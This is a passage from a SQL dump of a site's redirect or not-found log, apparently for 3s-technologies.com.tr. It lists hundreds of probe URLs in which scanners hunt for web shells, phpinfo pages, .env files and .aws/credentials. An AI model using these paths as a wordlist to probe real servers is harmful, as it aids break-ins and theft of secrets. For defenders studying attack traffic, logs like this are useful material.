00:00:00',301),(61200,'http://3s-technologies.com.tr/tr/wp-admin/includes/pomo.php',NULL,'','',2,0,'2026-04-09 18:51:46','0000-00-00 00:00:00',301),(61201,'http://3s-technologies.com.tr/tr/wp-admin/js/pomo.php',NULL,'','',2,0,'2026-04-09 18:51:47','0000-00-00 00:00:00',301),(61202,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/pomo.php',NULL,'','',2,0,'2026-04-09 18:51:47','0000-00-00 00:00:00',301),(61203,'http://3s-technologies.com.tr/tr/wp-admin/network/pomo.php',NULL,'','',2,0,'2026-04-09 18:51:48','0000-00-00 00:00:00',301),(61204,'http://3s-technologies.com.tr/tr/wp-admin/user/pomo.php',NULL,'','',2,0,'2026-04-09 18:51:49','0000-00-00 00:00:00',301),(61205,'http://3s-technologies.com.tr/tr/wp-content/uploads/pomo.php',NULL,'','',2,0,'2026-04-09 18:52:30','0000-00-00 00:00:00',301),(61206,'http://3s-technologies.com.tr/tr/wp-content/plugins/pomo.php',NULL,'','',2,0,'2026-04-09 18:52:31','0000-00-00 00:00:00',301),(61207,'http://3s-technologies.com.tr/tr/wp-content/languages/pomo.php',NULL,'','',2,0,'2026-04-09 18:52:32','0000-00-00 00:00:00',301),(61208,'http://3s-technologies.com.tr/tr/wp-content/languages/themes/pomo.php',NULL,'','',2,0,'2026-04-09 18:52:33','0000-00-00 00:00:00',301),(61209,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/pomo.php',NULL,'','',2,0,'2026-04-09 18:52:33','0000-00-00 00:00:00',301),(61210,'http://3s-technologies.com.tr/tr/.well-known/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2026-04-09 18:53:04','0000-00-00 00:00:00',301),(61211,'http://3s-technologies.com.tr/tr/tmp_images/alfacgiapi/perl.alfa',NULL,'','',2,0,'2026-04-09 18:53:05','0000-00-00 00:00:00',301),(61212,'http://3s-technologies.com.tr/tr/wp-admin/alfacgiapi/perl.alfa',NULL,'','',2,0,'2026-04-09 18:53:06','0000-00-00 00:00:00',301),(61213,'http://3s-technologies.com.tr/tr/wp-content/alfacgiapi/perl.alfa',NULL,'','',2,0,'2026-04-09 18:53:07','0000-00-00 00:00:00',301),(61214,'http://3s-technologies.com.tr/tr/wp-includes/alfacgiapi/perl.alfa',NULL,'','',2,0,'2026-04-09 18:53:07','0000-00-00 00:00:00',301),(61215,'http://3s-technologies.com.tr/tr/alfacgiapi/perl.alfa',NULL,'','',2,0,'2026-04-09 18:53:08','0000-00-00 00:00:00',301),(61216,'http://3s-technologies.com.tr/tr/css/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2026-04-09 18:53:09','0000-00-00 00:00:00',301),(61217,'http://3s-technologies.com.tr/tr/files/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2026-04-09 18:53:09','0000-00-00 00:00:00',301),(61218,'http://3s-technologies.com.tr/tr/images/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2026-04-09 18:53:11','0000-00-00 00:00:00',301),(61219,'http://3s-technologies.com.tr/tr/alfa_data/alfacgiapi/perl.alfa\"',NULL,'','',2,0,'2026-04-09 18:53:11','0000-00-00 00:00:00',301),(61220,'http://3s-technologies.com.tr/tr/wp-admin/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2026-04-09 18:53:12','0000-00-00 00:00:00',301),(61221,'http://3s-technologies.com.tr/tr/wp-content/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2026-04-09 18:53:13','0000-00-00 00:00:00',301),(61222,'http://3s-technologies.com.tr/tr/wp-admin/maint/pomo.php',NULL,'','',2,0,'2026-04-09 18:53:16','0000-00-00 00:00:00',301),(61223,'http://3s-technologies.com.tr/tr/wp-content/pomo.php',NULL,'','',2,0,'2026-04-09 18:53:17','0000-00-00 00:00:00',301),(61224,'http://3s-technologies.com.tr/tr/images/unzipper.php',NULL,'','',1,0,'2026-04-10 01:06:56','0000-00-00 00:00:00',301),(61225,'http://3s-technologies.com.tr/tr/zslede.php',NULL,'','',3,0,'2026-04-10 05:43:21','0000-00-00 00:00:00',301),(61226,'http://3s-technologies.com.tr/tr/zo.php',NULL,'','',10,0,'2026-04-10 05:43:22','0000-00-00 00:00:00',301),(61227,'http://3s-technologies.com.tr/tr/wxpass.php',NULL,'','',5,0,'2026-04-10 05:43:25','0000-00-00 00:00:00',301),(61228,'http://3s-technologies.com.tr/tr/themes4.php',NULL,'','',4,0,'2026-04-10 05:43:28','0000-00-00 00:00:00',301),(61229,'http://3s-technologies.com.tr/tr/disagrsxr.php',NULL,'','',4,0,'2026-04-10 05:43:28','0000-00-00 00:00:00',301),(61230,'http://3s-technologies.com.tr/tr/cobaini.php',NULL,'','',3,0,'2026-04-10 05:43:29','0000-00-00 00:00:00',301),(61231,'http://3s-technologies.com.tr/tr/cibai.php',NULL,'','',3,0,'2026-04-10 05:43:30','0000-00-00 00:00:00',301),(61232,'http://3s-technologies.com.tr/tr/zvz89.php',NULL,'','',4,0,'2026-04-10 05:43:31','0000-00-00 00:00:00',301),(61233,'http://3s-technologies.com.tr/tr/xwzs.php',NULL,'','',2,0,'2026-04-10 14:29:13','0000-00-00 00:00:00',301),(61234,'http://3s-technologies.com.tr/tr/wp-admin/network/users.php',NULL,'','',5,0,'2026-04-10 14:29:13','0000-00-00 00:00:00',301),(61235,'http://3s-technologies.com.tr/tr/ewe.php',NULL,'','',2,0,'2026-04-10 14:29:15','0000-00-00 00:00:00',301),(61236,'http://3s-technologies.com.tr/tr/aboute.php',NULL,'','',21,0,'2026-04-10 14:29:15','0000-00-00 00:00:00',301),(61237,'http://3s-technologies.com.tr/tr/redixsx.php',NULL,'','',4,0,'2026-04-10 14:29:19','0000-00-00 00:00:00',301),(61238,'http://3s-technologies.com.tr/tr/cpp2.php',NULL,'','',2,0,'2026-04-10 14:29:19','0000-00-00 00:00:00',301),(61239,'http://3s-technologies.com.tr/tr/admlo.php',NULL,'','',10,0,'2026-04-10 14:29:20','0000-00-00 00:00:00',301),(61240,'http://3s-technologies.com.tr/tr/amthd.php',NULL,'','',2,0,'2026-04-10 14:29:21','0000-00-00 00:00:00',301),(61241,'http://3s-technologies.com.tr/tr/njxjtooj.php',NULL,'','',2,0,'2026-04-10 14:29:25','0000-00-00 00:00:00',301),(61242,'http://3s-technologies.com.tr/tr/iyy.php',NULL,'','',2,0,'2026-04-10 14:29:27','0000-00-00 00:00:00',301),(61243,'http://3s-technologies.com.tr/tr/900.php',NULL,'','',5,0,'2026-04-10 14:29:28','0000-00-00 00:00:00',301),(61244,'http://3s-technologies.com.tr/tr/blsvgeyaza.php',NULL,'','',1,0,'2026-04-10 14:29:29','0000-00-00 00:00:00',301),(61245,'http://3s-technologies.com.tr/tr/gqhyti.php',NULL,'','',2,0,'2026-04-10 14:29:29','0000-00-00 00:00:00',301),(61246,'http://3s-technologies.com.tr/tr/autoxxi.php',NULL,'','',2,0,'2026-04-10 14:29:30','0000-00-00 00:00:00',301),(61247,'http://3s-technologies.com.tr/tr/1144452145_error_log.php',NULL,'','',2,0,'2026-04-10 14:29:31','0000-00-00 00:00:00',301),(61248,'http://3s-technologies.com.tr/tr/ws48.php',NULL,'','',5,0,'2026-04-10 14:29:31','0000-00-00 00:00:00',301),(61249,'http://3s-technologies.com.tr/tr/wp-asyn-upload.php',NULL,'','',4,0,'2026-04-10 14:29:32','0000-00-00 00:00:00',301),(61250,'http://3s-technologies.com.tr/tr/myfilexxx.php',NULL,'','',2,0,'2026-04-10 14:29:35','0000-00-00 00:00:00',301),(61251,'http://3s-technologies.com.tr/tr/karma_144a.php',NULL,'','',2,0,'2026-04-10 14:29:35','0000-00-00 00:00:00',301),(61252,'http://3s-technologies.com.tr/tr/3586 b64.php',NULL,'','',2,0,'2026-04-10 14:29:36','0000-00-00 00:00:00',301),(61253,'http://3s-technologies.com.tr/tr/bmi.php',NULL,'','',5,0,'2026-04-10 14:29:37','0000-00-00 00:00:00',301),(61254,'http://3s-technologies.com.tr/tr/file-mancvgertdxz.php',NULL,'','',3,0,'2026-04-10 14:29:42','0000-00-00 00:00:00',301),(61255,'http://3s-technologies.com.tr/tr/ws57.php',NULL,'','',14,0,'2026-04-10 14:29:43','0000-00-00 00:00:00',301),(61256,'http://3s-technologies.com.tr/tr/yw5bi63u.php',NULL,'','',5,0,'2026-04-10 14:29:45','0000-00-00 00:00:00',301),(61257,'http://3s-technologies.com.tr/tr/ss72_kkkjt.php',NULL,'','',15,0,'2026-04-10 15:14:48','0000-00-00 00:00:00',301),(61258,'http://3s-technologies.com.tr/tr/wkogn.php',NULL,'','',15,0,'2026-04-10 15:14:48','0000-00-00 00:00:00',301),(61259,'http://3s-technologies.com.tr/tr/hwjtry0zd1fzeakcuzn8cdefault.php',NULL,'','',12,0,'2026-04-10 15:14:51','0000-00-00 00:00:00',301),(61260,'http://3s-technologies.com.tr/tr/wwdgl.php',NULL,'','',15,0,'2026-04-10 15:14:52','0000-00-00 00:00:00',301),(61261,'http://3s-technologies.com.tr/tr/bhqks28cw94.php',NULL,'','',15,0,'2026-04-10 15:14:56','0000-00-00 00:00:00',301),(61262,'http://3s-technologies.com.tr/tr/cdn3.php',NULL,'','',15,0,'2026-04-10 15:14:56','0000-00-00 00:00:00',301),(61263,'http://3s-technologies.com.tr/tr/beerd.php',NULL,'','',15,0,'2026-04-10 15:14:57','0000-00-00 00:00:00',301),(61264,'http://3s-technologies.com.tr/tr/161dfd072f.php',NULL,'','',15,0,'2026-04-10 15:14:58','0000-00-00 00:00:00',301),(61265,'http://3s-technologies.com.tr/tr/ylzed0twj8l9drdbchc1oocfcdefault.php',NULL,'','',12,0,'2026-04-10 15:14:59','0000-00-00 00:00:00',301),(61266,'http://3s-technologies.com.tr/tr/blqjs.php',NULL,'','',15,0,'2026-04-10 15:15:01','0000-00-00 00:00:00',301),(61267,'http://3s-technologies.com.tr/tr/oircv.php',NULL,'','',15,0,'2026-04-10 15:15:03','0000-00-00 00:00:00',301),(61268,'http://3s-technologies.com.tr/tr/spow_srw.php',NULL,'','',15,0,'2026-04-10 15:15:04','0000-00-00 00:00:00',301),(61269,'http://3s-technologies.com.tr/tr/xxiviclhot.php',NULL,'','',15,0,'2026-04-10 15:15:05','0000-00-00 00:00:00',301),(61270,'http://3s-technologies.com.tr/tr/wxeyc.php',NULL,'','',15,0,'2026-04-10 15:15:06','0000-00-00 00:00:00',301),(61271,'http://3s-technologies.com.tr/tr/xltt.php',NULL,'','',32,0,'2026-04-10 15:15:07','0000-00-00 00:00:00',301),(61272,'http://3s-technologies.com.tr/tr/fyflv.php',NULL,'','',15,0,'2026-04-10 15:15:08','0000-00-00 00:00:00',301),(61273,'http://3s-technologies.com.tr/tr/zc-942.php',NULL,'','',15,0,'2026-04-10 15:15:08','0000-00-00 00:00:00',301),(61274,'http://3s-technologies.com.tr/tr/wpxl.php',NULL,'','',22,0,'2026-04-10 15:15:11','0000-00-00 00:00:00',301),(61275,'http://3s-technologies.com.tr/tr/bfil.php',NULL,'','',16,0,'2026-04-10 15:15:12','0000-00-00 00:00:00',301),(61276,'http://3s-technologies.com.tr/tr/dx.php',NULL,'','',75,0,'2026-04-10 15:15:13','0000-00-00 00:00:00',301),(61277,'http://3s-technologies.com.tr/tr/p14raewytpdh5hzcsccfdefault.php',NULL,'','',12,0,'2026-04-10 15:15:14','0000-00-00 00:00:00',301),(61278,'http://3s-technologies.com.tr/tr/maintura.php',NULL,'','',15,0,'2026-04-10 15:15:15','0000-00-00 00:00:00',301),(61279,'http://3s-technologies.com.tr/tr/iee52ruz0s81ndrdefault.php',NULL,'','',12,0,'2026-04-10 15:15:16','0000-00-00 00:00:00',301),(61280,'http://3s-technologies.com.tr/tr/nvwf4svpvqohxdjtbjcdefault.php',NULL,'','',12,0,'2026-04-10 15:15:16','0000-00-00 00:00:00',301),(61281,'http://3s-technologies.com.tr/tr/zc-220.php',NULL,'','',15,0,'2026-04-10 15:15:16','0000-00-00 00:00:00',301),(61282,'http://3s-technologies.com.tr/tr/fone1.php',NULL,'','',37,0,'2026-04-10 15:15:17','0000-00-00 00:00:00',301),(61283,'http://3s-technologies.com.tr/tr/xxivildiot.php',NULL,'','',15,0,'2026-04-10 15:15:18','0000-00-00 00:00:00',301),(61284,'http://3s-technologies.com.tr/tr/hanyatersenyum.php',NULL,'','',15,0,'2026-04-10 15:15:18','0000-00-00 00:00:00',301),(61285,'http://3s-technologies.com.tr/tr/upll22.php',NULL,'','',15,0,'2026-04-10 15:15:19','0000-00-00 00:00:00',301),(61286,'http://3s-technologies.com.tr/tr/zc-243.php',NULL,'','',15,0,'2026-04-10 15:15:21','0000-00-00 00:00:00',301),(61287,'http://3s-technologies.com.tr/tr/wp/jp.php',NULL,'','',12,0,'2026-04-10 15:16:17','0000-00-00 00:00:00',301),(61288,'http://3s-technologies.com.tr/tr/pm90apbv3v5fvgkbguyicdefault.php',NULL,'','',11,0,'2026-04-10 15:16:39','0000-00-00 00:00:00',301),(61289,'http://3s-technologies.com.tr/tr/flox.php',NULL,'','',6,0,'2026-04-10 19:35:47','0000-00-00 00:00:00',301),(61290,'http://3s-technologies.com.tr/tr/mff.php',NULL,'','',6,0,'2026-04-10 19:35:48','0000-00-00 00:00:00',301),(61291,'http://3s-technologies.com.tr/tr/filemanger2.php',NULL,'','',3,0,'2026-04-10 19:35:49','0000-00-00 00:00:00',301),(61292,'http://3s-technologies.com.tr/tr/wp-vn1.php',NULL,'','',3,0,'2026-04-10 19:35:50','0000-00-00 00:00:00',301),(61293,'http://3s-technologies.com.tr/tr/ewp.php',NULL,'','',16,0,'2026-04-10 19:35:51','0000-00-00 00:00:00',301),(61294,'http://3s-technologies.com.tr/tr/kikikoko.php',NULL,'','',20,0,'2026-04-10 19:35:51','0000-00-00 00:00:00',301),(61295,'http://3s-technologies.com.tr/tr/nwflm.php',NULL,'','',10,0,'2026-04-10 19:35:52','0000-00-00 00:00:00',301),(61296,'http://3s-technologies.com.tr/tr/awa.php',NULL,'','',18,0,'2026-04-10 19:35:54','0000-00-00 00:00:00',301),(61297,'http://3s-technologies.com.tr/tr/popo.php',NULL,'','',20,0,'2026-04-10 19:35:55','0000-00-00 00:00:00',301),(61298,'http://3s-technologies.com.tr/tr/wp-demomav.php',NULL,'','',3,0,'2026-04-11 06:19:19','0000-00-00 00:00:00',301),(61299,'http://3s-technologies.com.tr/tr/sites.php',NULL,'','',6,0,'2026-04-11 17:48:47','0000-00-00 00:00:00',301),(61300,'http://mail.3s-technologies.com.tr/tr/ga.php',NULL,'','',4,0,'2026-04-11 17:57:56','0000-00-00 00:00:00',301),(61301,'http://mail.3s-technologies.com.tr/tr/file-gertdxz.php',NULL,'','',4,0,'2026-04-11 17:58:02','0000-00-00 00:00:00',301),(61302,'http://3s-technologies.com.tr/tr/ga.php',NULL,'','',4,0,'2026-04-11 19:17:56','0000-00-00 00:00:00',301),(61303,'http://3s-technologies.com.tr/tr/file-gertdxz.php',NULL,'','',6,0,'2026-04-11 19:18:03','0000-00-00 00:00:00',301),(61304,'http://mail.3s-technologies.com.tr/tr/wp-widgets.php',NULL,'','',1,0,'2026-04-12 03:42:19','0000-00-00 00:00:00',301),(61305,'http://mail.3s-technologies.com.tr/tr/option.php',NULL,'','',4,0,'2026-04-12 03:42:20','0000-00-00 00:00:00',301),(61306,'http://mail.3s-technologies.com.tr/tr/wp-content/languages/about.php',NULL,'','',1,0,'2026-04-12 03:42:21','0000-00-00 00:00:00',301),(61307,'http://mail.3s-technologies.com.tr/tr/hhjj1kby8mq.php',NULL,'','',1,0,'2026-04-12 03:42:21','0000-00-00 00:00:00',301),(61308,'http://mail.3s-technologies.com.tr/tr/wp-admins.php',NULL,'','',1,0,'2026-04-12 03:42:37','0000-00-00 00:00:00',301),(61309,'http://3s-technologies.com.tr/tr/yrfloxbi.php',NULL,'','',2,0,'2026-04-12 08:09:58','0000-00-00 00:00:00',301),(61310,'http://3s-technologies.com.tr/tr/bjnygniu.php',NULL,'','',1,0,'2026-04-12 08:09:58','0000-00-00 00:00:00',301),(61311,'http://3s-technologies.com.tr/tr/cgql4oufhx6.php',NULL,'','',1,0,'2026-04-12 08:10:00','0000-00-00 00:00:00',301),(61312,'http://3s-technologies.com.tr/tr/s9ggwsawii.php',NULL,'','',1,0,'2026-04-12 08:10:01','0000-00-00 00:00:00',301),(61313,'http://3s-technologies.com.tr/tr/p1bbhnzr2ls.php',NULL,'','',1,0,'2026-04-12 08:10:02','0000-00-00 00:00:00',301),(61314,'http://3s-technologies.com.tr/tr/cvmlepae.php',NULL,'','',1,0,'2026-04-12 08:10:02','0000-00-00 00:00:00',301),(61315,'http://3s-technologies.com.tr/tr/qtjwdsjqvyt.php',NULL,'','',1,0,'2026-04-12 08:10:03','0000-00-00 00:00:00',301),(61316,'http://3s-technologies.com.tr/tr/u4fn8ylc6a2.php',NULL,'','',1,0,'2026-04-12 08:10:03','0000-00-00 00:00:00',301),(61317,'http://3s-technologies.com.tr/tr/class-wp-widget-block-query.php',NULL,'','',1,0,'2026-04-12 08:10:05','0000-00-00 00:00:00',301),(61318,'http://3s-technologies.com.tr/tr/commentv.php',NULL,'','',1,0,'2026-04-12 08:10:05','0000-00-00 00:00:00',301),(61319,'http://3s-technologies.com.tr/tr/ciyrfck.php',NULL,'','',1,0,'2026-04-12 08:10:06','0000-00-00 00:00:00',301),(61320,'http://3s-technologies.com.tr/tr/pattern-overrides-float.php',NULL,'','',1,0,'2026-04-12 08:10:07','0000-00-00 00:00:00',301),(61321,'http://3s-technologies.com.tr/tr/uujiorjc.php',NULL,'','',1,0,'2026-04-12 08:10:07','0000-00-00 00:00:00',301),(61322,'http://3s-technologies.com.tr/tr/zghidhavqu4.php',NULL,'','',1,0,'2026-04-12 08:10:08','0000-00-00 00:00:00',301),(61323,'http://3s-technologies.com.tr/tr/hfoua3mld2n.php',NULL,'','',1,0,'2026-04-12 08:10:08','0000-00-00 00:00:00',301),(61324,'http://3s-technologies.com.tr/tr/ykujz1catjd.php',NULL,'','',1,0,'2026-04-12 08:10:10','0000-00-00 00:00:00',301),(61325,'http://3s-technologies.com.tr/tr/ace.php',NULL,'','',2,0,'2026-04-12 08:10:10','0000-00-00 00:00:00',301),(61326,'http://3s-technologies.com.tr/tr/rcdqlhszchp.php',NULL,'','',1,0,'2026-04-12 08:10:12','0000-00-00 00:00:00',301),(61327,'http://3s-technologies.com.tr/tr/qjswaimu3x8.php',NULL,'','',1,0,'2026-04-12 08:10:12','0000-00-00 00:00:00',301),(61328,'http://3s-technologies.com.tr/tr/xfwgmcsephk.php',NULL,'','',1,0,'2026-04-12 08:10:13','0000-00-00 00:00:00',301),(61329,'http://3s-technologies.com.tr/tr/eyanhyzu16g.php',NULL,'','',1,0,'2026-04-12 08:10:13','0000-00-00 00:00:00',301),(61330,'http://3s-technologies.com.tr/tr/module.audio-video.asf-constructor.php',NULL,'','',1,0,'2026-04-12 08:10:14','0000-00-00 00:00:00',301),(61331,'http://3s-technologies.com.tr/tr/option-more.php',NULL,'','',1,0,'2026-04-12 08:10:14','0000-00-00 00:00:00',301),(61332,'http://3s-technologies.com.tr/tr/pagea.php',NULL,'','',1,0,'2026-04-12 08:10:15','0000-00-00 00:00:00',301),(61333,'http://3s-technologies.com.tr/tr/site-upload.php',NULL,'','',1,0,'2026-04-12 08:10:16','0000-00-00 00:00:00',301),(61334,'http://3s-technologies.com.tr/tr/eoudvsor.php',NULL,'','',1,0,'2026-04-12 08:10:16','0000-00-00 00:00:00',301),(61335,'http://3s-technologies.com.tr/tr/ztrovl9h2mr.php',NULL,'','',1,0,'2026-04-12 08:10:17','0000-00-00 00:00:00',301),(61336,'http://3s-technologies.com.tr/tr/class-wp-simplepie-sanitize-kses-repository.php',NULL,'','',1,0,'2026-04-12 08:10:17','0000-00-00 00:00:00',301),(61337,'http://3s-technologies.com.tr/tr/class-wp-nav-menu-widget-module.php',NULL,'','',1,0,'2026-04-12 08:10:18','0000-00-00 00:00:00',301),(61338,'http://3s-technologies.com.tr/tr/cdhjunptsr.php',NULL,'','',1,0,'2026-04-12 08:10:18','0000-00-00 00:00:00',301),(61339,'http://3s-technologies.com.tr/tr/bjw1d8fxpte.php',NULL,'','',1,0,'2026-04-12 08:10:19','0000-00-00 00:00:00',301),(61340,'http://3s-technologies.com.tr/tr/meta-json.php',NULL,'','',1,0,'2026-04-12 08:10:20','0000-00-00 00:00:00',301),(61341,'http://3s-technologies.com.tr/tr/remv.php.infected.php',NULL,'','',1,0,'2026-04-12 08:10:21','0000-00-00 00:00:00',301),(61342,'http://3s-technologies.com.tr/tr/iyjzstwk.php',NULL,'','',1,0,'2026-04-12 08:10:21','0000-00-00 00:00:00',301),(61343,'http://3s-technologies.com.tr/tr/class-wp-widget-head.php',NULL,'','',1,0,'2026-04-12 08:10:22','0000-00-00 00:00:00',301),(61344,'http://3s-technologies.com.tr/tr/ffxgklwprja.php',NULL,'','',1,0,'2026-04-12 08:10:23','0000-00-00 00:00:00',301),(61345,'http://3s-technologies.com.tr/tr/ixjqo3zfpn4.php',NULL,'','',1,0,'2026-04-12 08:10:23','0000-00-00 00:00:00',301),(61346,'http://3s-technologies.com.tr/tr/jsx5mvehoyv.php',NULL,'','',1,0,'2026-04-12 08:10:24','0000-00-00 00:00:00',301),(61347,'http://3s-technologies.com.tr/tr/qdadli2xvtu.php',NULL,'','',1,0,'2026-04-12 08:10:24','0000-00-00 00:00:00',301),(61348,'http://3s-technologies.com.tr/tr/ro36etsqukb.php',NULL,'','',1,0,'2026-04-12 08:10:26','0000-00-00 00:00:00',301),(61349,'http://3s-technologies.com.tr/tr/xbfpkuvd.php',NULL,'','',1,0,'2026-04-12 08:10:26','0000-00-00 00:00:00',301),(61350,'http://3s-technologies.com.tr/tr/uploads/upload_example.php',NULL,'','',1,0,'2026-04-12 10:22:50','0000-00-00 00:00:00',301),(61351,'http://3s-technologies.com.tr/tr/wp-ahsera.php',NULL,'','',1,0,'2026-04-12 10:22:54','0000-00-00 00:00:00',301),(61352,'http://3s-technologies.com.tr/tr/wp-easy.php',NULL,'','',1,0,'2026-04-12 10:22:55','0000-00-00 00:00:00',301),(61353,'http://3s-technologies.com.tr/tr/wp-video.php',NULL,'','',1,0,'2026-04-12 10:22:55','0000-00-00 00:00:00',301),(61354,'http://3s-technologies.com.tr/tr/class-wp-http-requests-hooks.php',NULL,'','',1,0,'2026-04-12 10:22:57','0000-00-00 00:00:00',301),(61355,'http://3s-technologies.com.tr/tr/class-envato-market-api.php',NULL,'','',1,0,'2026-04-12 10:22:58','0000-00-00 00:00:00',301),(61356,'https://www.3s-technologies.com.tr/en/info.php.bak',NULL,'','',1,0,'2026-04-12 10:34:49','0000-00-00 00:00:00',301),(61357,'https://www.3s-technologies.com.tr/en/newinfo.php',NULL,'','',1,0,'2026-04-12 10:34:50','0000-00-00 00:00:00',301),(61358,'https://www.3s-technologies.com.tr/en/siteinfo.php',NULL,'','',1,0,'2026-04-12 10:34:51','0000-00-00 00:00:00',301),(61359,'https://www.3s-technologies.com.tr/en/info.php.1',NULL,'','',1,0,'2026-04-12 10:34:51','0000-00-00 00:00:00',301),(61360,'https://www.3s-technologies.com.tr/en/admin/phpinfo.php',NULL,'','',1,0,'2026-04-12 10:34:52','0000-00-00 00:00:00',301),(61361,'https://www.3s-technologies.com.tr/en/pageinfo.php',NULL,'','',1,0,'2026-04-12 10:34:52','0000-00-00 00:00:00',301),(61362,'https://www.3s-technologies.com.tr/en/info.php.back',NULL,'','',1,0,'2026-04-12 10:34:53','0000-00-00 00:00:00',301),(61363,'https://www.3s-technologies.com.tr/en/phpbb/phpinfo.php',NULL,'','',1,0,'2026-04-12 10:34:53','0000-00-00 00:00:00',301),(61364,'https://www.3s-technologies.com.tr/en/release_info.php',NULL,'','',1,0,'2026-04-12 10:34:54','0000-00-00 00:00:00',301),(61365,'https://www.3s-technologies.com.tr/en/test/info.php',NULL,'','',1,0,'2026-04-12 10:34:54','0000-00-00 00:00:00',301),(61366,'https://www.3s-technologies.com.tr/en/info',NULL,'','',1,0,'2026-04-12 10:34:54','0000-00-00 00:00:00',301),(61367,'https://www.3s-technologies.com.tr/en/info.php',NULL,'','',1,0,'2026-04-12 10:34:55','0000-00-00 00:00:00',301),(61368,'https://www.3s-technologies.com.tr/en/phpinfo.php.txt',NULL,'','',1,0,'2026-04-12 10:34:56','0000-00-00 00:00:00',301),(61369,'https://www.3s-technologies.com.tr/en/info.php.save.1',NULL,'','',1,0,'2026-04-12 10:34:56','0000-00-00 00:00:00',301),(61370,'https://www.3s-technologies.com.tr/en/info.php_',NULL,'','',1,0,'2026-04-12 10:34:57','0000-00-00 00:00:00',301),(61371,'https://www.3s-technologies.com.tr/en/_info.php',NULL,'','',1,0,'2026-04-12 10:34:57','0000-00-00 00:00:00',301),(61372,'https://www.3s-technologies.com.tr/en/admin_phpinfo.php',NULL,'','',1,0,'2026-04-12 10:34:58','0000-00-00 00:00:00',301),(61373,'https://www.3s-technologies.com.tr/en/dbinfo.php',NULL,'','',1,0,'2026-04-12 10:34:58','0000-00-00 00:00:00',301),(61374,'https://www.3s-technologies.com.tr/en/admin_info.php',NULL,'','',1,0,'2026-04-12 10:34:59','0000-00-00 00:00:00',301),(61375,'https://www.3s-technologies.com.tr/en/.aws/credentials',NULL,'','',1,0,'2026-04-12 10:34:59','0000-00-00 00:00:00',301),(61376,'https://www.3s-technologies.com.tr/en/config.php',NULL,'','',1,0,'2026-04-12 10:35:00','0000-00-00 00:00:00',301),(61377,'https://www.3s-technologies.com.tr/en/phpinfo.php',NULL,'','',1,0,'2026-04-12 10:35:00','0000-00-00 00:00:00',301),(61378,'https://www.3s-technologies.com.tr/en/phpinfo.php.bak',NULL,'','',1,0,'2026-04-12 10:35:01','0000-00-00 00:00:00',301),(61379,'https://www.3s-technologies.com.tr/en/admin/admin_phpinfo.php4',NULL,'','',1,0,'2026-04-12 10:35:01','0000-00-00 00:00:00',301),(61380,'https://www.3s-technologies.com.tr/en/.env.bak',NULL,'','',1,0,'2026-04-12 10:35:02','0000-00-00 00:00:00',301),(61381,'https://www.3s-technologies.com.tr/en/.env',NULL,'','',2,0,'2026-04-12 10:35:02','0000-00-00 00:00:00',301),(61382,'https://www.3s-technologies.com.tr/en/.env.backup',NULL,'','',1,0,'2026-04-12 10:35:03','0000-00-00 00:00:00',301),(61383,'https://www.3s-technologies.com.tr/en/.env_sample',NULL,'','',1,0,'2026-04-12 10:35:03','0000-00-00 00:00:00',301),(61384,'https://www.3s-technologies.com.tr/en/.env.old',NULL,'','',1,0,'2026-04-12 10:35:04','0000-00-00 00:00:00',301),(61385,'https://www.3s-technologies.com.tr/en/.env.www',NULL,'','',1,0,'2026-04-12 10:35:04','0000-00-00 00:00:00',301),(61386,'https://www.3s-technologies.com.tr/en/.docker/.env',NULL,'','',1,0,'2026-04-12 10:35:04','0000-00-00 00:00:00',301),(61387,'https://www.3s-technologies.com.tr/en/.env.dev',NULL,'','',1,0,'2026-04-12 10:35:05','0000-00-00 00:00:00',301),(61388,'https://www.3s-technologies.com.tr/en/.env.example',NULL,'','',1,0,'2026-04-12 10:35:05','0000-00-00 00:00:00',301),(61389,'https://www.3s-technologies.com.tr/en/.env_1',NULL,'','',1,0,'2026-04-12 10:35:06','0000-00-00 00:00:00',301),(61390,'https://www.3s-technologies.com.tr/en/.env.stage',NULL,'','',1,0,'2026-04-12 10:35:06','0000-00-00 00:00:00',301),(61391,'https://www.3s-technologies.com.tr/en/config.env',NULL,'','',1,0,'2026-04-12 10:35:07','0000-00-00 00:00:00',301),(61392,'https://www.3s-technologies.com.tr/en/.pam_environment',NULL,'','',1,0,'2026-04-12 10:35:08','0000-00-00 00:00:00',301),(61393,'https://www.3s-technologies.com.tr/en/.environment',NULL,'','',1,0,'2026-04-12 10:35:08','0000-00-00 00:00:00',301),(61394,'https://www.3s-technologies.com.tr/en/.env.production',NULL,'','',1,0,'2026-04-12 10:35:09','0000-00-00 00:00:00',301),(61395,'https://www.3s-technologies.com.tr/en/.env.production.local',NULL,'','',1,0,'2026-04-12 10:35:09','0000-00-00 00:00:00',301),(61396,'https://www.3s-technologies.com.tr/en/env.js',NULL,'','',1,0,'2026-04-12 10:35:09','0000-00-00 00:00:00',301),(61397,'https://www.3s-technologies.com.tr/en/.powenv',NULL,'','',1,0,'2026-04-12 10:35:10','0000-00-00 00:00:00',301),(61398,'https://www.3s-technologies.com.tr/en/.rbenv-gemsets',NULL,'','',1,0,'2026-04-12 10:35:10','0000-00-00 00:00:00',301),(61399,'https://www.3s-technologies.com.tr/en/.envs',NULL,'','',1,0,'2026-04-12 10:35:11','0000-00-00 00:00:00',301),(61400,'https://www.3s-technologies.com.tr/en/.env.docker',NULL,'','',1,0,'2026-04-12 10:35:11','0000-00-00 00:00:00',301),(61401,'https://www.3s-technologies.com.tr/en/.env.sample',NULL,'','',1,0,'2026-04-12 10:35:12','0000-00-00 00:00:00',301),(61402,'https://www.3s-technologies.com.tr/en/.env_bak',NULL,'','',1,0,'2026-04-12 10:35:12','0000-00-00 00:00:00',301),(61403,'https://www.3s-technologies.com.tr/en/.env.php',NULL,'','',1,0,'2026-04-12 10:35:12','0000-00-00 00:00:00',301),(61404,'https://www.3s-technologies.com.tr/en/.env.development.local',NULL,'','',1,0,'2026-04-12 10:35:13','0000-00-00 00:00:00',301),(61405,'https://www.3s-technologies.com.tr/en/.env-example',NULL,'','',1,0,'2026-04-12 10:35:13','0000-00-00 00:00:00',301),(61406,'https://www.3s-technologies.com.tr/en/.env.prod',NULL,'','',1,0,'2026-04-12 10:35:14','0000-00-00 